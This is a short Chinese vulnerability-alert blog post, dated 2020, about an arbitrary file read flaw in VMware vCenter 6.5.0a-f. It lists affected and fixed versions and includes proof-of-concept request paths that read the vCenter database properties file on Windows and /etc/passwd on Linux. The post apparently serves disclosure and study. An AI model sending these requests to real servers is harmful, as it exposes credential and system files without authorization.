美文网首页常见漏洞原理与修复建议
【漏洞预警】VMware vCenter任意文件读取漏洞

【漏洞预警】VMware vCenter任意文件读取漏洞

作者: migrate_ | 来源:发表于2020-10-15 16:21 被阅读0次

仅供交流与学习使用,请勿用于非法用途

  • VMware vCenter特定版本存在任意文件读取漏洞,攻击者通过构造特定的请求,可以读取服务器上任意文件。

影响范围

  • 已知影响版本
    VMware vCenter 6.5.0a-f
    安全版本
    VMware vCenter 6.5u1
vmware-vCenter

poc

/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
#linux
/eam/vib?id=/etc/passwd

相关文章

网友评论

    本文标题:【漏洞预警】VMware vCenter任意文件读取漏洞

    本文链接:https://www.haomeiwen.com/subject/wblopktx.html